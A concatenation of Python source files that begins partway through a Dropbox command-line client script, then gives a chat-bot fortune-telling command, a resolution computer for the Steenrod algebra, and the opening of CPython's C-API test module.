self.clicked_link = False
def label_motion(self, widget, event):
offx, offy = self.label.get_layout_offsets()
layout = self.label.get_layout()
index = layout.xy_to_index(int((offx+event.x)*pango.SCALE),
int((offy+event.y)*pango.SCALE))[0]
link_index = layout.get_text().find(LINK)
if index >= link_index and index < link_index+len(LINK):
self.hovering = True
self.label_box.window.set_cursor(gtk.gdk.Cursor(gtk.gdk.HAND2))
else:
self.hovering = False
self.label_box.window.set_cursor(gtk.gdk.Cursor(gtk.gdk.ARROW))
def __init__(self):
super(DownloadDialog, self).__init__(parent = None,
title = "Dropbox Installation")
self.download = None
self.hovering = False
self.clicked_link = False
self.user_cancelled = False
self.task = None
self.ok = ok = gtk.Button(stock=gtk.STOCK_OK)
ok.connect('clicked', self.handle_ok)
self.action_area.add(ok)
ok.show()
cancel = gtk.Button(stock=gtk.STOCK_CANCEL)
cancel.connect('clicked', self.handle_cancel)
self.action_area.add(cancel)
cancel.show()
self.connect('delete_event', self.handle_delete_event)
self.box_logo = gtk.image_new_from_pixbuf(box_logo_pixbuf)
self.box_logo.show()
self.set_icon(window_icon)
self.progress = gtk.ProgressBar()
self.progress.set_property('width-request', 300)
self.label = gtk.Label()
GPG_WARNING_MSG = (u"\n\n" + GPG_WARNING) if not gpgme else u""
self.label.set_markup('%s <span foreground="#000099" underline="single" weight="bold">%s</span>\n\n%s%s' % (INFO, LINK, WARNING, GPG_WARNING_MSG))
self.label.set_line_wrap(True)
self.label.set_property('width-request', 300)
self.label.show()
self.label_box = gtk.EventBox()
self.label_box.add(self.label)
self.label_box.connect("button-release-event", self.mouse_up)
self.label_box.connect("button-press-event", self.mouse_down)
self.label_box.connect("motion-notify-event", self.label_motion)
self.label_box.show()
def on_realize(widget):
self.label_box.add_events(gtk.gdk.POINTER_MOTION_MASK)
self.label_box.connect("realize", on_realize)
self.hbox = gtk.HBox(spacing=10)
self.hbox.set_property('border-width',10)
self.hbox.pack_start(self.box_logo, False, False)
self.hbox.pack_start(self.label_box, False, False)
self.hbox.pack_start(self.progress, False, False)
self.hbox.show()
self.vbox.add(self.hbox)
self.dont_show_again_align = None
try:
if can_reroll_autostart():
dont_show_again = gtk.CheckButton("_Don't show this again")
dont_show_again.connect('toggled', self.handle_dont_show_toggle)
dont_show_again.show()
self.dont_show_again_align = gtk.Alignment(xalign=1.0, yalign=0.0, xscale=0.0, yscale=0.0)
self.dont_show_again_align.add(dont_show_again)
self.dont_show_again_align.show()
hbox = gtk.HBox()
hbox.set_property('border-width', 10)
hbox.pack_start(self.dont_show_again_align, True, True)
hbox.show()
self.vbox.add(hbox)
self.set_resizable(False)
except:
traceback.print_exc()
self.ok.grab_focus()
dialog = DownloadDialog()
dialog.show()
gtk.main()
if dialog.user_cancelled:
raise Exception("user cancelled download!!!")
else:
def download():
global FatalVisibleError
def FatalVisibleError(s):
console_print(u"\nError: %s" % s, f=sys.stderr)
sys.exit(-1)
ESC = "\x1b"
save = ESC+"7"
unsave = ESC+"8"
clear = ESC+"[2J"
erase_to_start = ESC+"[1K"
write = sys.stdout.write
flush = sys.stdout.flush
last_progress = [None, None]
def setprogress(text, frac):
if last_progress == [text, frac]:
return
if sys.stdout.isatty():
write(erase_to_start)
write(unsave)
console_print(text % int(100*frac), linebreak=not sys.stdout.isatty())
if sys.stdout.isatty():
flush()
last_progress[0], last_progress[1] = text, frac
console_print()
if sys.stdout.isatty():
write(save)
flush()
console_print(u"%s %s\n" % (INFO, LINK))
GPG_WARNING_MSG = (u"\n%s" % GPG_WARNING) if not gpgme else u""
if not yes_no_question("%s%s" % (WARNING, GPG_WARNING_MSG)):
return
download = DownloadState()
try:
for progress, status in download.copy_data():
if not status:
break
setprogress(DOWNLOADING, progress)
except Exception:
FatalVisibleError(ERROR_CONNECTING)
else:
setprogress(DOWNLOADING, 1.0)
console_print()
write(save)
try:
for name, i, total in download.unpack():
setprogress(UNPACKING, float(i)/total)
except SignatureVerifyError:
FatalVisibleError(ERROR_SIGNATURE)
except Exception:
FatalVisibleError(ERROR_CONNECTING)
else:
setprogress(UNPACKING, 1.0)
console_print()
class CommandTicker(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.stop_event = threading.Event()
def stop(self):
self.stop_event.set()
def run(self):
ticks = ['[. ]', '[.. ]', '[...]', '[ ..]', '[ .]', '[ ]']
i = 0
first = True
while True:
self.stop_event.wait(0.25)
if self.stop_event.isSet(): break
if i == len(ticks):
first = False
i = 0
if not first:
sys.stderr.write("\r%s\r" % ticks[i])
sys.stderr.flush()
i += 1
sys.stderr.flush()
class DropboxCommand(object):
class CouldntConnectError(Exception): pass
class BadConnectionError(Exception): pass
class EOFError(Exception): pass
class CommandError(Exception): pass
def __init__(self, timeout=5):
self.s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.s.settimeout(timeout)
try:
self.s.connect(os.path.expanduser(u'~/.dropbox/command_socket'))
except socket.error, e:
raise DropboxCommand.CouldntConnectError()
self.f = self.s.makefile("r+", 4096)
def close(self):
self.f.close()
self.s.close()
def __readline(self):
try:
toret = self.f.readline().decode('utf8').rstrip(u"\n")
except socket.error, e:
raise DropboxCommand.BadConnectionError()
if toret == '':
raise DropboxCommand.EOFError()
else:
return toret
# atttribute doesn't exist, i know what you want
def send_command(self, name, args):
self.f.write(name.encode('utf8'))
self.f.write(u"\n".encode('utf8'))
self.f.writelines((u"\t".join([k] + (list(v)
if hasattr(v, '__iter__') else
[v])) + u"\n").encode('utf8')
for k,v in args.iteritems())
self.f.write(u"done\n".encode('utf8'))
self.f.flush()
# Start a ticker
ticker_thread = CommandTicker()
ticker_thread.start()
# This is the potentially long-running call.
try:
ok = self.__readline() == u"ok"
except KeyboardInterrupt:
raise DropboxCommand.BadConnectionError("Keyboard interruption detected")
finally:
# Tell the ticker to stop.
ticker_thread.stop()
ticker_thread.join()
if ok:
toret = {}
for i in range(21):
if i == 20:
raise Exception(u"close this connection!")
line = self.__readline()
if line == u"done":
break
argval = line.split(u"\t")
toret[argval[0]] = argval[1:]
return toret
else:
problems = []
for i in range(21):
if i == 20:
raise Exception(u"close this connection!")
line = self.__readline()
if line == u"done":
break
problems.append(line)
raise DropboxCommand.CommandError(u"\n".join(problems))
# this is the hotness, auto marshalling
def __getattr__(self, name):
try:
return super(DropboxCommand, self).__getattr__(name)
except:
def __spec_command(**kw):
return self.send_command(unicode(name), kw)
self.__setattr__(name, __spec_command)
return __spec_command
commands = {}
aliases = {}
def command(meth):
global commands, aliases
assert meth.__doc__, "All commands need properly formatted docstrings (even %r!!)" % meth
if hasattr(meth, 'im_func'): # bound method, if we ever have one
meth = meth.im_func
commands[meth.func_name] = meth
meth_aliases = [unicode(alias) for alias in aliases.iterkeys() if aliases[alias].func_name == meth.func_name]
if meth_aliases:
meth.__doc__ += u"\nAliases: %s" % ",".join(meth_aliases)
return meth
def alias(name):
def decorator(meth):
global commands, aliases
assert name not in commands, "This alias is the name of a command."
aliases[name] = meth
return meth
return decorator
def requires_dropbox_running(meth):
def newmeth(*n, **kw):
if is_dropbox_running():
return meth(*n, **kw)
else:
console_print(u"Dropbox isn't running!")
newmeth.func_name = meth.func_name
newmeth.__doc__ = meth.__doc__
return newmeth
def start_dropbox():
db_path = os.path.expanduser(u"~/.dropbox-dist/dropboxd").encode(sys.getfilesystemencoding())
if os.access(db_path, os.X_OK):
f = open("/dev/null", "w")
# we don't reap the child because we're gonna die anyway, let init do it
a = subprocess.Popen([db_path], preexec_fn=os.setsid, cwd=os.path.expanduser("~"),
stderr=sys.stderr, stdout=f, close_fds=True)
# in seconds
interval = 0.5
wait_for = 60
for i in xrange(int(wait_for / interval)):
if is_dropbox_running():
return True
# back off from connect for a while
time.sleep(interval)
return False
else:
return False
# Extracted and modified from os.cmd.Cmd
def columnize(list, display_list=None, display_width=None):
if not list:
console_print(u"<empty>")
return
non_unicode = [i for i in range(len(list)) if not (isinstance(list[i], unicode))]
if non_unicode:
raise TypeError, ("list[i] not a string for i in %s" %
", ".join(map(unicode, non_unicode)))
if not display_width:
d = os.popen('stty size', 'r').read().split()
if d:
display_width = int(d[1])
else:
for item in list:
console_print(item)
return
if not display_list:
display_list = list
size = len(list)
if size == 1:
console_print(display_list[0])
return
for nrows in range(1, len(list)):
ncols = (size+nrows-1) // nrows
colwidths = []
totwidth = -2
for col in range(ncols):
colwidth = 0
for row in range(nrows):
i = row + nrows*col
if i >= size:
break
x = list[i]
colwidth = max(colwidth, len(x))
colwidths.append(colwidth)
totwidth += colwidth + 2
if totwidth > display_width:
break
if totwidth <= display_width:
break
else:
nrows = len(list)
ncols = 1
colwidths = [0]
lines = []
for row in range(nrows):
texts = []
display_texts = []
for col in range(ncols):
i = row + nrows*col
if i >= size:
x = ""
y = ""
else:
x = list[i]
y = display_list[i]
texts.append(x)
display_texts.append(y)
while texts and not texts[-1]:
del texts[-1]
original_texts = texts[:]
for col in range(len(texts)):
texts[col] = texts[col].ljust(colwidths[col])
texts[col] = texts[col].replace(original_texts[col], display_texts[col])
line = u" ".join(texts)
lines.append(line)
for line in lines:
console_print(line)
@command
@requires_dropbox_running
@alias('stat')
def filestatus(args):
u"""get current sync status of one or more files
dropbox filestatus [-l] [-a] [FILE]...
Prints the current status of each FILE.
options:
-l --list prints out information in a format similar to ls. works best when your console supports color :)
-a --all do not ignore entries starting with .
"""
global enc
oparser = optparse.OptionParser()
oparser.add_option("-l", "--list", action="store_true", dest="list")
oparser.add_option("-a", "--all", action="store_true", dest="all")
(options, args) = oparser.parse_args(args)
try:
with closing(DropboxCommand()) as dc:
if options.list:
# Listing.
# Separate directories from files.
if len(args) == 0:
dirs, nondirs = [u"."], []
else:
dirs, nondirs = [], []
for a in args:
try:
(dirs if os.path.isdir(a) else nondirs).append(a.decode(enc))
except UnicodeDecodeError:
continue
if len(dirs) == 0 and len(nondirs) == 0:
#TODO: why?
exit(1)
dirs.sort(key=methodcaller('lower'))
nondirs.sort(key=methodcaller('lower'))
# Gets a string representation for a path.
def path_to_string(file_path):
if not os.path.exists(file_path):
path = u"%s (File doesn't exist!)" % os.path.basename(file_path)
return (path, path)
try:
status = dc.icon_overlay_file_status(path=file_path).get(u'status', [None])[0]
except DropboxCommand.CommandError, e:
path = u"%s (%s)" % (os.path.basename(file_path), e)
return (path, path)
env_term = os.environ.get('TERM','')
supports_color = (sys.stderr.isatty() and (
env_term.startswith('vt') or
env_term.startswith('linux') or
'xterm' in env_term or
'color' in env_term
)
)
# TODO: Test when you don't support color.
if not supports_color:
path = os.path.basename(file_path)
return (path, path)
if status == u"up to date":
init, cleanup = "\x1b[32;1m", "\x1b[0m"
elif status == u"syncing":
init, cleanup = "\x1b[36;1m", "\x1b[0m"
elif status == u"unsyncable":
init, cleanup = "\x1b[41;1m", "\x1b[0m"
elif status == u"selsync":
init, cleanup = "\x1b[37;1m", "\x1b[0m"
else:
init, cleanup = '', ''
path = os.path.basename(file_path)
return (path, u"%s%s%s" % (init, path, cleanup))
# Prints a directory.
def print_directory(name):
clean_paths = []
formatted_paths = []
for subname in sorted(os.listdir(name), key=methodcaller('lower')):
if type(subname) != unicode:
continue
if not options.all and subname[0] == u'.':
continue
try:
clean, formatted = path_to_string(unicode_abspath(os.path.join(name, subname)))
clean_paths.append(clean)
formatted_paths.append(formatted)
except (UnicodeEncodeError, UnicodeDecodeError), e:
continue
columnize(clean_paths, formatted_paths)
try:
if len(dirs) == 1 and len(nondirs) == 0:
print_directory(dirs[0])
else:
nondir_formatted_paths = []
nondir_clean_paths = []
for name in nondirs:
try:
clean, formatted = path_to_string(unicode_abspath(name))
nondir_clean_paths.append(clean)
nondir_formatted_paths.append(formatted)
except (UnicodeEncodeError, UnicodeDecodeError), e:
continue
if nondir_clean_paths:
columnize(nondir_clean_paths, nondir_formatted_paths)
if len(nondirs) == 0:
console_print(dirs[0] + u":")
print_directory(dirs[0])
dirs = dirs[1:]
for name in dirs:
console_print()
console_print(name + u":")
print_directory(name)
except DropboxCommand.EOFError:
console_print(u"Dropbox daemon stopped.")
except DropboxCommand.BadConnectionError, e:
console_print(u"Dropbox isn't responding!")
else:
if len(args) == 0:
args = [name for name in sorted(os.listdir(u"."), key=methodcaller('lower')) if type(name) == unicode]
if len(args) == 0:
# Bail early if there's nothing to list to avoid crashing on indent below
console_print(u"<empty>")
return
indent = max(len(st)+1 for st in args)
for file in args:
try:
if type(file) is not unicode:
file = file.decode(enc)
fp = unicode_abspath(file)
except (UnicodeEncodeError, UnicodeDecodeError), e:
continue
if not os.path.exists(fp):
console_print(u"%-*s %s" % \
(indent, file+':', "File doesn't exist"))
continue
try:
status = dc.icon_overlay_file_status(path=fp).get(u'status', [u'unknown'])[0]
console_print(u"%-*s %s" % (indent, file+':', status))
except DropboxCommand.CommandError, e:
console_print(u"%-*s %s" % (indent, file+':', e))
except DropboxCommand.CouldntConnectError, e:
console_print(u"Dropbox isn't running!")
@command
@requires_dropbox_running
def ls(args):
u"""list directory contents with current sync status
dropbox ls [FILE]...
This is an alias for filestatus -l
"""
return filestatus(["-l"] + args)
@command
@requires_dropbox_running
def puburl(args):
u"""get public url of a file in your dropbox
dropbox puburl FILE
Prints out a public url for FILE.
"""
if len(args) != 1:
console_print(puburl.__doc__,linebreak=False)
return
try:
with closing(DropboxCommand()) as dc:
try:
console_print(dc.get_public_link(path=unicode_abspath(args[0].decode(sys.getfilesystemencoding()))).get(u'link', [u'No Link'])[0])
except DropboxCommand.CommandError, e:
console_print(u"Couldn't get public url: " + str(e))
except DropboxCommand.BadConnectionError, e:
console_print(u"Dropbox isn't responding!")
except DropboxCommand.EOFError:
console_print(u"Dropbox daemon stopped.")
except DropboxCommand.CouldntConnectError, e:
console_print(u"Dropbox isn't running!")
@command
@requires_dropbox_running
def status(args):
u"""get current status of the dropboxd
dropbox status
Prints out the current status of the Dropbox daemon.
"""
if len(args) != 0:
console_print(status.__doc__,linebreak=False)
return
try:
with closing(DropboxCommand()) as dc:
try:
lines = dc.get_dropbox_status()[u'status']
if len(lines) == 0:
console_print(u'Idle')
else:
for line in lines:
console_print(line)
except KeyError:
console_print(u"Couldn't get status: daemon isn't responding")
except DropboxCommand.CommandError, e:
console_print(u"Couldn't get status: " + str(e))
except DropboxCommand.BadConnectionError, e:
console_print(u"Dropbox isn't responding!")
except DropboxCommand.EOFError:
console_print(u"Dropbox daemon stopped.")
except DropboxCommand.CouldntConnectError, e:
console_print(u"Dropbox isn't running!")
@command
def running(argv):
u"""return whether dropbox is running
dropbox running
Returns 1 if running 0 if not running.
"""
return int(is_dropbox_running())
@command
@requires_dropbox_running
def stop(args):
u"""stop dropboxd
dropbox stop
Stops the dropbox daemon.
"""
try:
with closing(DropboxCommand()) as dc:
try:
dc.tray_action_hard_exit()
except DropboxCommand.BadConnectionError, e:
console_print(u"Dropbox isn't responding!")
except DropboxCommand.EOFError:
console_print(u"Dropbox daemon stopped.")
except DropboxCommand.CouldntConnectError, e:
console_print(u"Dropbox isn't running!")
#returns true if link is necessary
def grab_link_url_if_necessary():
try:
with closing(DropboxCommand()) as dc:
try:
link_url = dc.needs_link().get(u"link_url", None)
if link_url is not None:
console_print(u"To link this computer to a dropbox account, visit the following url:\n%s" % link_url[0])
return True
else:
return False
except DropboxCommand.CommandError, e:
pass
except DropboxCommand.BadConnectionError, e:
console_print(u"Dropbox isn't responding!")
except DropboxCommand.EOFError:
console_print(u"Dropbox daemon stopped.")
except DropboxCommand.CouldntConnectError, e:
console_print(u"Dropbox isn't running!")
@command
@requires_dropbox_running
def lansync(argv):
u"""enables or disables LAN sync
dropbox lansync [y/n]
options:
y dropbox will use LAN sync (default)
n dropbox will not use LAN sync
"""
if len(argv) != 1:
console_print(lansync.__doc__, linebreak=False)
return
s = argv[0].lower()
if s.startswith('y') or s.startswith('-y'):
should_lansync = True
elif s.startswith('n') or s.startswith('-n'):
should_lansync = False
else:
should_lansync = None
if should_lansync is None:
console_print(lansync.__doc__,linebreak=False)
else:
with closing(DropboxCommand()) as dc:
dc.set_lan_sync(lansync='enabled' if should_lansync else 'disabled')
@command
@requires_dropbox_running
def exclude(args):
u"""ignores/excludes a directory from syncing
dropbox exclude [list]
dropbox exclude add [DIRECTORY] [DIRECTORY] ...
dropbox exclude remove [DIRECTORY] [DIRECTORY] ...
"list" prints a list of directories currently excluded from syncing.
"add" adds one or more directories to the exclusion list, then resynchronizes Dropbox.
"remove" removes one or more directories from the exclusion list, then resynchronizes Dropbox.
With no arguments, executes "list".
Any specified path must be within Dropbox.
"""
if len(args) == 0:
try:
with closing(DropboxCommand()) as dc:
try:
lines = [relpath(path) for path in dc.get_ignore_set()[u'ignore_set']]
lines.sort()
if len(lines) == 0:
console_print(u'No directories are being ignored.')
else:
console_print(u'Excluded: ')
for line in lines:
console_print(unicode(line))
except KeyError:
console_print(u"Couldn't get ignore set: daemon isn't responding")
except DropboxCommand.CommandError, e:
if e.args[0].startswith(u"No command exists by that name"):
console_print(u"This version of the client does not support this command.")
else:
console_print(u"Couldn't get ignore set: " + str(e))
except DropboxCommand.BadConnectionError, e:
console_print(u"Dropbox isn't responding!")
except DropboxCommand.EOFError:
console_print(u"Dropbox daemon stopped.")
except DropboxCommand.CouldntConnectError, e:
console_print(u"Dropbox isn't running!")
elif len(args) == 1 and args[0] == u"list":
exclude([])
elif len(args) >= 2:
sub_command = args[0]
paths = args[1:]
absolute_paths = [unicode_abspath(path.decode(sys.getfilesystemencoding())) for path in paths]
if sub_command == u"add":
try:
with closing(DropboxCommand(timeout=None)) as dc:
try:
result = dc.ignore_set_add(paths=absolute_paths)
if result[u"ignored"]:
console_print(u"Excluded: ")
lines = [relpath(path) for path in result[u"ignored"]]
for line in lines:
console_print(unicode(line))
except KeyError:
console_print(u"Couldn't add ignore path: daemon isn't responding")
except DropboxCommand.CommandError, e:
if e.args[0].startswith(u"No command exists by that name"):
console_print(u"This version of the client does not support this command.")
else:
console_print(u"Couldn't get ignore set: " + str(e))
except DropboxCommand.BadConnectionError, e:
console_print(u"Dropbox isn't responding! [%s]" % e)
except DropboxCommand.EOFError:
console_print(u"Dropbox daemon stopped.")
except DropboxCommand.CouldntConnectError, e:
console_print(u"Dropbox isn't running!")
elif sub_command == u"remove":
try:
with closing(DropboxCommand(timeout=None)) as dc:
try:
result = dc.ignore_set_remove(paths=absolute_paths)
if result[u"removed"]:
console_print(u"No longer excluded: ")
lines = [relpath(path) for path in result[u"removed"]]
for line in lines:
console_print(unicode(line))
except KeyError:
console_print(u"Couldn't remove ignore path: daemon isn't responding")
except DropboxCommand.CommandError, e:
if e.args[0].startswith(u"No command exists by that name"):
console_print(u"This version of the client does not support this command.")
else:
console_print(u"Couldn't get ignore set: " + str(e))
except DropboxCommand.BadConnectionError, e:
console_print(u"Dropbox isn't responding! [%s]" % e)
except DropboxCommand.EOFError:
console_print(u"Dropbox daemon stopped.")
except DropboxCommand.CouldntConnectError, e:
console_print(u"Dropbox isn't running!")
else:
console_print(exclude.__doc__, linebreak=False)
return
else:
console_print(exclude.__doc__, linebreak=False)
return
@command
def start(argv):
u"""start dropboxd
dropbox start [-i]
Starts the dropbox daemon, dropboxd. If dropboxd is already running, this will do nothing.
options:
-i --install auto install dropboxd if not available on the system
"""
should_install = "-i" in argv or "--install" in argv
# first check if dropbox is already running
if is_dropbox_running():
if not grab_link_url_if_necessary():
console_print(u"Dropbox is already running!")
return
console_print(u"Starting Dropbox...", linebreak=False)
console_flush()
if not start_dropbox():
if not should_install:
console_print()
console_print(u"The Dropbox daemon is not installed!")
console_print(u"Run \"dropbox start -i\" to install the daemon")
return
# install dropbox!!!
try:
download()
except:
traceback.print_exc()
else:
if GUI_AVAILABLE:
start_dropbox()
console_print(u"Done!")
else:
if start_dropbox():
if not grab_link_url_if_necessary():
console_print(u"Done!")
else:
if not grab_link_url_if_necessary():
console_print(u"Done!")
def can_reroll_autostart():
return u".config" in os.listdir(os.path.expanduser(u'~'))
def reroll_autostart(should_autostart):
home_dir = os.path.expanduser(u'~')
contents = os.listdir(home_dir)
# UBUNTU
if u".config" in contents:
autostart_dir = os.path.join(home_dir, u".config", u"autostart")
autostart_link = os.path.join(autostart_dir, u"dropbox.desktop")
if should_autostart:
if os.path.exists(DESKTOP_FILE):
if not os.path.exists(autostart_dir):
os.makedirs(autostart_dir)
shutil.copyfile(DESKTOP_FILE, autostart_link)
elif os.path.exists(autostart_link):
os.remove(autostart_link)
@command
def autostart(argv):
u"""automatically start dropbox at login
dropbox autostart [y/n]
options:
n dropbox will not start automatically at login
y dropbox will start automatically at login (default)
Note: May only work on current Ubuntu distributions.
"""
if len(argv) != 1:
console_print(''.join(autostart.__doc__.split('\n', 1)[1:]).decode('ascii'))
return
s = argv[0].lower()
if s.startswith('y') or s.startswith('-y'):
should_autostart = True
elif s.startswith('n') or s.startswith('-n'):
should_autostart = False
else:
should_autostart = None
if should_autostart is None:
console_print(autostart.__doc__,linebreak=False)
else:
reroll_autostart(should_autostart)
@command
def help(argv):
u"""provide help
dropbox help [COMMAND]
With no arguments, print a list of commands and a short description of each. With a command, print descriptive help on how to use the command.
"""
if not argv:
return usage(argv)
for command in commands:
if command == argv[0]:
console_print(commands[command].__doc__.split('\n', 1)[1].decode('ascii'))
return
for alias in aliases:
if alias == argv[0]:
console_print(aliases[alias].__doc__.split('\n', 1)[1].decode('ascii'))
return
console_print(u"unknown command '%s'" % argv[0], f=sys.stderr)
def usage(argv):
console_print(u"Dropbox command-line interface\n")
console_print(u"commands:\n")
console_print(u"Note: use dropbox help <command> to view usage for a specific command.\n")
out = []
for command in commands:
out.append((command, commands[command].__doc__.splitlines()[0]))
spacing = max(len(o[0])+3 for o in out)
for o in out:
console_print(" %-*s%s" % (spacing, o[0], o[1]))
console_print()
def main(argv):
global commands
# now we need to find out if one of the commands are in the
# argv list, and if so split the list at the point to
# separate the argv list at that point
cut = None
for i in range(len(argv)):
if argv[i] in commands or argv[i] in aliases:
cut = i
break
if cut == None:
usage(argv)
os._exit(0)
return
# lol no options for now
globaloptionparser = optparse.OptionParser()
globaloptionparser.parse_args(argv[0:i])
# now dispatch and run
result = None
if argv[i] in commands:
result = commands[argv[i]](argv[i+1:])
elif argv[i] in aliases:
result = aliases[argv[i]](argv[i+1:])
# flush, in case output is rerouted to a file.
console_flush()
# done
return result
if __name__ == "__main__":
ret = main(sys.argv)
if ret is not None:
sys.exit(ret)
|
zoltar.py
|
import logging, coloredlogs
from threading import Thread
from random import choice
from modules.config import *
from modules.database import Database
from modules.timer import Timer
database = Database(db_host, db_user, db_pass, db_name, db_autocommit)
database.database_connection()
class Zoltar:
CommandMain = 'zoltar'
CommandMainOptions = []
CommandResponses = []
ZoltarCooldown = []
def __init__(self, user, question):
self.user = user
self.cooldown_timer = Timer(self.user, ZOLTAR_COOLDOWN, Zoltar.ZoltarCooldown, "ZoltarCooldown")
self.minutes = int(ZOLTAR_COOLDOWN / 60)
self.question = question
self.responses = [
'it is certain',
'it is decidedly so',
'without a doubt',
'yes, definitely',
'you may rely on it',
'as I see it, yes',
'most likely',
'outlook good',
'yes',
'signs point to yes',
'better not tell you now',
'cannot predict now',
'don\'t count on it',
'my reply is no',
'my sources say no',
'outlook not so good',
'very doubtful',
]
def execute_command(self, command):
if(self.user not in Zoltar.ZoltarCooldown):
self.prediction()
def prediction(self):
from modules.bot import bot_msg
response = choice(self.responses)
bot_msg("Zoltar takes {} of your {} and looks into the crystal ball.. he responds, \"{} {}\" deIlluminati".format(ZOLTAR_COST, CURRENCY, response, self.user))
database.db_minus_points_user(self.user, ZOLTAR_COST)
Thread(target=self.cooldown_timer.cooldown_run).start()
|
resolution.py
|
import asyncio
import time
import threading
from message_passing_tree.prelude import *
from message_passing_tree import MathAgent
from .fp import Matrix
from .algebra import AdemAlgebra
from .module import FDModule
from . import RustResolution
import rust_ext
RustResolutionHomomorphism = rust_ext.ResolutionHomomorphism
def st_to_xy(s, t):
return (t-s, s)
def xy_to_st(x, y):
return (y, x + y)
def make_unit_module():
A = AdemAlgebra(2)
M = FDModule(A, "M", 0)
M.add_generator(0, "x0")
M.freeze()
return M
@subscribe_to("*")
@collect_handlers(inherit=False)
class Resolver(MathAgent):
def __init__(self, name, chart=None, module=None):
super().__init__()
if module is None:
self.M = make_unit_module()
else:
self.M = module
self.name=name
self.A = self.M.algebra
self.rust_res = RustResolution(self.M)
self.rust_res.freeze()
self.loop = asyncio.get_event_loop() # Need this so that worker thread can submit events to run on the same event loop as main thread
self.filtration_one_products = self.A.default_filtration_one_products()[:-1]
self.class_handlers = []
self.structline_handlers = []
self.max_degree = -1
self.target_max_degree = -1
self.finished_degrees = set()
self.unfinished_degrees = {}
self.unit_resolution = None
self.chain_maps_to_unit_resolution = [[None] * 200 for _ in range(200)]
self.chart = chart
def resolve(self, n):
t = threading.Thread(target=self._resolve_st_rectangle(n), daemon=True)
t.start()
# self._resolve_thread(n)()
def _resolve_st_rectangle(self, n):
def run():
asyncio.set_event_loop(self.loop)
self.A.compute_basis(n)
self.target_max_degree = n
self.rust_res.extend_through_degree(n, n)
t0 = time.time()
for t in range(n):
for s in range(n):
self.step_if_needed(s,t)
t1 = time.time()
time_elapsed = t1 - t0
print(f"Time taken to resolve {self.name} from stem {self.max_degree + 1} to stem {self.target_max_degree}:", time_elapsed)
self.max_degree = self.target_max_degree
return run
def _resolve_xy_rectangle(self, n):
def run():
self.A.compute_basis( x + y + 1)
self.target_max_degree = n
self.rust_res.extend_through_degree( x + y + 2)
t0 = time.time()
for x in range(n):
for y in range(n):
self.step_if_needed(*xy_to_st(x,y))
t1 = time.time()
time_elapsed = t1 - t0
print(f"Time taken to resolve {self.name} from stem {self.max_degree + 1} to stem {self.target_max_degree}:", time_elapsed)
self.max_degree = self.target_max_degree
return run
def step_if_needed(self, i, j):
if (i, j) not in self.finished_degrees:
self.rust_res.step_resolution(i,j)
asyncio.ensure_future(self.step_after(i, j))
# if self.rust_res.number_of_gens_in_bidegree(i, j) > 0:
# print(i, j, self.rust_res.number_of_gens_in_bidegree(i, j))
# f = asyncio.run_coroutine_threadsafe(
# self.broadcast(["resolution", "finished_bidegree"], i, j),
# self.loop
# )
# f.result()
self.finished_degrees.add((i, j))
async def step_after(self, s, t):
if not self.chart:
return
self.add_classes(s, t)
products = self.compute_filtration_one_products(s, t)
for product in products:
source_t = product["source_t"]
source_s = product["source_s"]
target_t = t
target_s = s
table = product["table"]
for (source_idx, row) in enumerate(iter(table)):
for (target_idx, entry) in enumerate(iter(row)):
if entry != 0:
await self.add_structline(
source_s, source_t, source_idx,
target_s, target_t, target_idx
)
await self.chart.update_a()
def add_classes(self, s, t):
for i in range(self.rust_res.number_of_gens_in_bidegree(s, t)):
self.chart.sseq.add_class(*st_to_xy(s, t))
async def add_structline(self,
source_s, source_t, source_idx,
target_s, target_t, target_idx
):
try:
source = self.chart.sseq.class_by_idx(*st_to_xy(source_s, source_t), source_idx)
target = self.chart.sseq.class_by_idx(*st_to_xy(target_s, target_t), target_idx)
self.chart.sseq.add_structline(source, target)
except Exception as e:
await self.send_error_a("", exception=e)
def cocycle_string(self, x, y, idx):
return self.rust_res.cocycle_string(*xy_to_st(x, y), idx)
def compute_filtration_one_products(self, target_s, target_t):
if target_s == 0:
return []
source_s = target_s - 1
source = self.rust_res.module(source_s)
target = self.rust_res.module(target_s)
target_dim = target.number_of_gens_in_degree(target_t)
result = []
for (op_name, op_degree, op_index) in self.filtration_one_products:
source_t = target_t - op_degree
if source_t - source_s < self.rust_res.min_degree:
continue
source_dim = source.number_of_gens_in_degree(source_t)
d = self.rust_res.differential(target_s)
products = [[0 for _ in range(target_dim)] for _ in range(source_dim)]
for target_idx in range(target_dim):
dx = d.output(target_t, target_idx)
for source_idx in range(source_dim):
idx = source.operation_generator_to_index(op_degree, op_index, source_t, source_idx)
products[source_idx][target_idx] = dx.entry(idx)
result.append({"source_s" : source_s, "source_t" : source_t, "table" : products})
return result
def construct_maps_to_unit_resolution_in_bidegree(self, s, t):
if self.unit_resolution is None:
raise ValueError("Need to define self.unit_resolution first.")
if self.chain_maps_to_unit_resolution[s][t] is not None:
return
p = self.rust_res.prime()
# Populate the arrays if the ResolutionHomomorphisms have not been defined.
num_gens = self.rust_res.module(s).number_of_gens_in_degree(t)
self.chain_maps_to_unit_resolution[s][t] = []
if num_gens == 0:
return
unit_vector = Matrix(p, num_gens, 1)
for idx in range(num_gens):
f = RustResolutionHomomorphism(
f"(hom_deg : {s}, int_deg : {t}, idx : {idx})",
self.rust_res, self.unit_resolution,
s, t
)
unit_vector[idx].set_entry(0, 1)
f.extend_step(s, t, unit_vector)
unit_vector[idx].set_to_zero_pure()
self.chain_maps_to_unit_resolution[s][t].append(f)
def construct_maps_to_unit_resolution(self):
for s in range(self.max_degree):
for t in range(self.max_degree):
self.construct_maps_to_unit_resolution_in_bidegree(s, t)
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from __future__ import with_statement
import sys
import time
import random
import unittest
from test import test_support
try:
import threading
except ImportError:
threading = None
import _testcapi
@unittest.skipUnless(threading, 'Threading required for this test.')
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break;
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0;
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and test_support.verbose:
print "(%i)"%(len(l),),
for i in xrange(1000):
a = i*i
